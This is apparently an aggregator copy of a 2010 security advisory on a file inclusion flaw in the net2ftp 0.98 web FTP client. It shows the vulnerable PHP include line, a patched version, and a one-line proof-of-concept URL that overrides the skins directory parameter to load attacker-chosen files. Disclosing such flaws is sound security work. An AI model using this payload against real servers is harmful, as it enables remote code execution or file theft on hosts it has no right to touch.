Lucene search
K

net2ftp Stable 0.98 Remote / Local File Inclusion

🗓️ 09 Dec 2010 00:00:00Reported by Marcin ResselType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

net2ftp 0.98 Remote / Local File Inclusion vulnerabilit

Code
`net2ftp is web based ftp client used by many web shared hosting  
////////////////////////////////////////////////////////////////////  
Vuln is in file skins/mobile/admin1.template.php:  
  
<?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>  
  
///////////////////////////////////////////////////////////////////  
Pathed Version:  
<?php  
defined("NET2FTP") or die("Direct access to this location is not allowed.");  
require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php");  
?>  
  
//////////////////////////////////////////////////////////////////  
POC:  
http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation